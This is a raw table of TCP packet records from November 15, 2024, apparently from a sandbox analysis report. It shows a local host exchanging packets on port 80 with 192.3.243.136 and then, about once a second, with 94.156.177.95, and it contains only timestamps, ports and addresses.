Nov 15, 2024 18:14:27.477782965 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477828979 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477829933 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477880001 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477932930 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.477932930 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.477984905 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478033066 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478034019 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.478086948 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478135109 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.478135109 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478188038 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478234053 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.478234053 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478283882 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478332043 CET	80	49738	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:27.478332996 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.526846886 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:27.578052998 CET	49738	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:28.575795889 CET	49739	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:28.580916882 CET	80	49739	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:28.581056118 CET	49739	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:28.583125114 CET	49739	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:28.588072062 CET	80	49739	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:28.588136911 CET	49739	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:28.592991114 CET	80	49739	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:29.538896084 CET	80	49739	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:29.539078951 CET	49739	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:29.544429064 CET	80	49739	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:29.544519901 CET	49739	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:29.684192896 CET	49740	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:29.689404011 CET	80	49740	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:29.689667940 CET	49740	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:29.691334963 CET	49740	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:29.696491003 CET	80	49740	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:29.696597099 CET	49740	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:29.701514959 CET	80	49740	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:30.671838045 CET	80	49740	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:30.675329924 CET	49740	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:30.680830002 CET	80	49740	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:30.683346987 CET	49740	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:30.781533003 CET	49741	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:30.786735058 CET	80	49741	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:30.787137985 CET	49741	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:30.789119005 CET	49741	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:30.794045925 CET	80	49741	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:30.795104027 CET	49741	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:30.800123930 CET	80	49741	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:31.757117987 CET	80	49741	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:31.757246971 CET	49741	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:31.762597084 CET	80	49741	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:31.762654066 CET	49741	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:31.907341957 CET	49742	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:31.912398100 CET	80	49742	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:31.912606001 CET	49742	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:31.914752960 CET	49742	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:31.919687033 CET	80	49742	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:31.919894934 CET	49742	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:31.924792051 CET	80	49742	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:32.888520002 CET	80	49742	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:32.891366005 CET	49742	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:32.896680117 CET	80	49742	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:32.899259090 CET	49742	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:33.045938969 CET	49743	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:33.050901890 CET	80	49743	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:33.051126957 CET	49743	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:33.052884102 CET	49743	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:33.057790041 CET	80	49743	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:33.059120893 CET	49743	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:33.064002991 CET	80	49743	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:34.033890963 CET	80	49743	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:34.034010887 CET	49743	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:34.039377928 CET	80	49743	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:34.039442062 CET	49743	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:34.167010069 CET	49744	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:34.172228098 CET	80	49744	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:34.172311068 CET	49744	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:34.174204111 CET	49744	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:34.179152966 CET	80	49744	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:34.179210901 CET	49744	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:34.184091091 CET	80	49744	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:35.158873081 CET	80	49744	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:35.159054041 CET	49744	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:35.164578915 CET	80	49744	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:35.164639950 CET	49744	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:35.313637972 CET	49745	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:35.318717003 CET	80	49745	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:35.319061995 CET	49745	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:35.320996046 CET	49745	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:35.325886965 CET	80	49745	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:35.327061892 CET	49745	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:35.332037926 CET	80	49745	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:36.284205914 CET	80	49745	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:36.284393072 CET	49745	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:36.290488958 CET	80	49745	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:36.290735006 CET	49745	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:36.455888033 CET	49746	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:36.461648941 CET	80	49746	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:36.461724997 CET	49746	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:36.464710951 CET	49746	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:36.470540047 CET	80	49746	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:36.470587015 CET	49746	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:36.476448059 CET	80	49746	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:37.438709974 CET	80	49746	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:37.443015099 CET	49746	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:37.448793888 CET	80	49746	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:37.448870897 CET	49746	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:37.599594116 CET	49747	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:37.605470896 CET	80	49747	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:37.605551004 CET	49747	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:37.607319117 CET	49747	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:37.613138914 CET	80	49747	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:37.613187075 CET	49747	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:37.619311094 CET	80	49747	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:38.600548983 CET	80	49747	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:38.600814104 CET	49747	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:38.608489990 CET	80	49747	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:38.608566046 CET	49747	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:38.754971027 CET	49748	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:38.760004044 CET	80	49748	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:38.760090113 CET	49748	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:38.762506008 CET	49748	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:38.767359972 CET	80	49748	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:38.767432928 CET	49748	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:38.772278070 CET	80	49748	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:39.761516094 CET	80	49748	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:39.761617899 CET	49748	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:39.766951084 CET	80	49748	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:39.767014980 CET	49748	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:39.903601885 CET	49749	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:39.908783913 CET	80	49749	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:39.908873081 CET	49749	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:39.910825968 CET	49749	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:39.915734053 CET	80	49749	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:39.915788889 CET	49749	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:39.920623064 CET	80	49749	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:40.866601944 CET	80	49749	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:40.866806984 CET	49749	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:40.872267962 CET	80	49749	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:40.872329950 CET	49749	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:41.009273052 CET	49750	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:41.014961004 CET	80	49750	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:41.015047073 CET	49750	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:41.016753912 CET	49750	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:41.021755934 CET	80	49750	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:41.021819115 CET	49750	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:41.026712894 CET	80	49750	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:42.015927076 CET	80	49750	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:42.016290903 CET	49750	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:42.021786928 CET	80	49750	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:42.021877050 CET	49750	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:42.157609940 CET	49751	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:42.162755013 CET	80	49751	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:42.162832022 CET	49751	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:42.164769888 CET	49751	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:42.169648886 CET	80	49751	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:42.169694901 CET	49751	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:42.174611092 CET	80	49751	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:43.118540049 CET	80	49751	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:43.119045019 CET	49751	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:43.124310017 CET	80	49751	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:43.124353886 CET	49751	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:43.283066034 CET	49752	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:43.288156033 CET	80	49752	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:43.288239002 CET	49752	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:43.289971113 CET	49752	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:43.294836998 CET	80	49752	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:43.295006037 CET	49752	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:43.299901962 CET	80	49752	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:44.288290024 CET	80	49752	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:44.288552999 CET	49752	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:44.294140100 CET	80	49752	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:44.294229984 CET	49752	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:44.434993982 CET	49753	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:44.439976931 CET	80	49753	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:44.440063000 CET	49753	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:44.442001104 CET	49753	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:44.446810961 CET	80	49753	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:44.446887970 CET	49753	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:44.451730013 CET	80	49753	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:45.435973883 CET	80	49753	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:45.436269999 CET	49753	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:45.441545963 CET	80	49753	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:45.441617966 CET	49753	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:45.579090118 CET	49754	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:45.584038973 CET	80	49754	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:45.584122896 CET	49754	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:45.585858107 CET	49754	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:45.590749979 CET	80	49754	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:45.590810061 CET	49754	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:45.595792055 CET	80	49754	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:46.563261032 CET	80	49754	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:46.563404083 CET	49754	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:46.568841934 CET	80	49754	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:46.568914890 CET	49754	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:46.700707912 CET	49755	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:46.705776930 CET	80	49755	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:46.705890894 CET	49755	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:46.709453106 CET	49755	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:46.714421988 CET	80	49755	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:46.714498043 CET	49755	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:46.719446898 CET	80	49755	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:47.660944939 CET	80	49755	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:47.661087990 CET	49755	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:47.666395903 CET	80	49755	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:47.666459084 CET	49755	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:47.867918015 CET	49756	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:47.874218941 CET	80	49756	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:47.874294996 CET	49756	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:47.876998901 CET	49756	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:47.881985903 CET	80	49756	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:47.882050991 CET	49756	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:47.886936903 CET	80	49756	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:48.863275051 CET	80	49756	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:48.863645077 CET	49756	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:48.868839025 CET	80	49756	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:48.868911028 CET	49756	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:49.021972895 CET	49757	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:49.026928902 CET	80	49757	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:49.027023077 CET	49757	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:49.029119968 CET	49757	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:49.034051895 CET	80	49757	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:49.034111977 CET	49757	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:49.039026976 CET	80	49757	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:49.974807024 CET	80	49757	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:49.974935055 CET	49757	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:49.980312109 CET	80	49757	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:49.980424881 CET	49757	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:50.171080112 CET	49758	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:50.175942898 CET	80	49758	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:50.176016092 CET	49758	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:50.178024054 CET	49758	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:50.182918072 CET	80	49758	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:50.182971001 CET	49758	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:50.187876940 CET	80	49758	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:51.170826912 CET	80	49758	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:51.170948029 CET	49758	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:51.176297903 CET	80	49758	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:51.176373005 CET	49758	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:51.307490110 CET	49759	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:51.312473059 CET	80	49759	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:51.312556028 CET	49759	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:51.314537048 CET	49759	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:51.319426060 CET	80	49759	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:51.319509029 CET	49759	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:51.324541092 CET	80	49759	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:52.290635109 CET	80	49759	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:52.291245937 CET	49759	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:52.296732903 CET	80	49759	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:52.299133062 CET	49759	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:52.440360069 CET	49760	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:52.445628881 CET	80	49760	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:52.446660995 CET	49760	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:52.448914051 CET	49760	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:52.453814030 CET	80	49760	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:52.454052925 CET	49760	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:52.458921909 CET	80	49760	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:53.435466051 CET	80	49760	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:53.435600996 CET	49760	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:53.441225052 CET	80	49760	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:53.441279888 CET	49760	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:53.578528881 CET	49761	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:53.583513975 CET	80	49761	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:53.583708048 CET	49761	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:53.586914062 CET	49761	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:53.591797113 CET	80	49761	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:53.594420910 CET	49761	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:53.599443913 CET	80	49761	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:54.533124924 CET	80	49761	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:54.533463955 CET	49761	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:54.538825989 CET	80	49761	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:54.539067030 CET	49761	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:54.682460070 CET	49762	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:54.687429905 CET	80	49762	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:54.687602043 CET	49762	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:54.689611912 CET	49762	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:54.694447041 CET	80	49762	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:54.694504976 CET	49762	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:54.699320078 CET	80	49762	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:56.696182966 CET	80	49762	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:56.696356058 CET	49762	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:56.701606989 CET	80	49762	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:56.701685905 CET	49762	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:56.884660006 CET	49763	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:56.890018940 CET	80	49763	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:56.890440941 CET	49763	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:56.892213106 CET	49763	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:56.897319078 CET	80	49763	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:56.897576094 CET	49763	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:56.902945995 CET	80	49763	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:57.891151905 CET	80	49763	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:57.891299009 CET	49763	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:57.896446943 CET	80	49763	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:57.896565914 CET	49763	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:58.032296896 CET	49765	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:58.040695906 CET	80	49765	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:58.042032003 CET	49765	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:58.043782949 CET	49765	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:58.048898935 CET	80	49765	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:58.049519062 CET	49765	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:58.054426908 CET	80	49765	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:58.995851040 CET	80	49765	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:58.995980978 CET	49765	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:59.001251936 CET	80	49765	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:59.001323938 CET	49765	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:59.149460077 CET	49767	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:59.154359102 CET	80	49767	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:59.154418945 CET	49767	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:59.156507015 CET	49767	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:59.161712885 CET	80	49767	94.156.177.95	192.168.2.4
Nov 15, 2024 18:14:59.161813974 CET	49767	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:14:59.166822910 CET	80	49767	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:00.106925011 CET	80	49767	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:00.107047081 CET	49767	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:00.112386942 CET	80	49767	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:00.115149021 CET	49767	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:00.298732996 CET	49773	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:00.303735971 CET	80	49773	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:00.303936958 CET	49773	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:00.306016922 CET	49773	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:00.310940027 CET	80	49773	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:00.310997009 CET	49773	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:00.315836906 CET	80	49773	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:01.274903059 CET	80	49773	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:01.275022984 CET	49773	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:01.280237913 CET	80	49773	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:01.280302048 CET	49773	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:01.420778990 CET	49779	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:01.425848961 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:01.426059008 CET	49779	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:01.428194046 CET	49779	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:01.433192015 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:01.433269978 CET	49779	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:01.438180923 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.623159885 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.623425007 CET	49779	80	192.168.2.4	94.156.177.95
Nov 15, 2024 18:15:02.623583078 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.623634100 CET	80	49779	94.156.177.95	192.168.2.4
Nov 15, 2024 18:15:02.623636007 CET	49779	80	192.168.2.4	94.156.177.95
